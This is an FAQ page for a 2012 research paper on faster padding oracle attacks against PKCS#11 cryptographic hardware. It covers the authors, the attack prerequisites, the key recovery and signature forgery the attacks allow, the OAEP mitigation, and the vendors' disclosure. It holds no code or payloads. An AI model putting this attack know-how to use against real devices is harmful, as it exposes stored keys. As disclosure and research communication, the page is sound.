"Efficient Padding Oracle Attacks on Cryptographic Hardware" FAQ

  1. Where can I find a copy of the paper? Where is it being published?

    Here. It will appear at CRYPTO'12 in August 2012.

  2. Where can I read a less technical account?

    Matthew Green's blog provides a nice write-up.

  3. Who carried out this research, and what are their affiliations?

    Romain Bardou (INRIA project Secsi, France), Riccardo Focardi (Unversità Ca' Foscari Venezia, Italy), Yusuke Kawamoto (University of Birmingham, UK), Lorenzo Simionato (Unversità Ca' Foscari Venezia, Italy), Graham Steel (INRIA project ProSecCo, France), Joe-Kai Tsay (Norges teknisk-naturvitenskapelige universitet, Norway).

    Some of the work was carried out while Kawamoto, Steel, and Tsay were working in INRIA project Secsi at LSV, ENS-Cachan. Simionato is now at Google.

  4. What are the prerequisites for these attacks?

    You need access to the UnwrapKey function. This could be achieved, for example, directly by putting malware on the host machine, or indirectly if the unwrap key functionality is exposed via a network protocol.

  5. What are the consequences of these attacks?

    The modified version of the Bleichenbacher attack reveals a plaintext encrypted under an RSA key. That plaintext, in the context of the PKCS#11 UnwrapKey command, is a symmetric key. The same attack can also be used to forge a signature, though this takes longer. Our paper gives full details.

    The Vaudenay CBC attack may reveal either a symmetric key or a private RSA key if it has been exported from a device under a symmetric cipher like AES using CBC_PAD.

  6. How much do you improve on previous attacks on PKCS#1v1.5 ?

    The best previous attack was due to Klima et al., which is roughly twice as fast as Bleichenbacher's original algorithm on a standard PKCS1v1.5 padding oracle. Our attack is more then ten times as fast as the original algorithm, so a factor of five improvement on the best previously known attack. Here we measure speed as the median number of oracle calls required to complete the attack, measured over 1000 runs with different RSA keypairs.

  7. Is there a patch for the PKCS#1v1.5 vulnerability?

    Yes, use a padding mode that has IND-CCA security proofs, like OAEP as standardised in PKCS#1v2, and make sure this is the only mode available at the API.

  8. Do the attacks in the paper reveal the private half of RSA keypairs?

    Like the original algroithm, our version of the Bleichenbacher attack does not reveal the private half of the RSA key used for encryption.

  9. Do your attacks reveal the seed values used to generate one time passwords (OTPs) on an RSA token?


  10. Did you follow "responsible disclosure" procedures?

    Yes. All affected vendors were informed more then 12 months before the paper was published.

Last modified: Wed Jun 27 11:53:32 EDT 2012